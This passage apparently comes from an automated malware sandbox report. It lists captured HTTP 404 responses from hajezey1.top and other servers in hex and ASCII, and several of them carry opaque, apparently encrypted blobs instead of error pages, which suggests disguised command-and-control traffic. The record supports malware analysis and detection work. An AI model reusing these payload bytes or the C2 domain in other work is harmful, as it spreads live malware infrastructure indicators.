6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 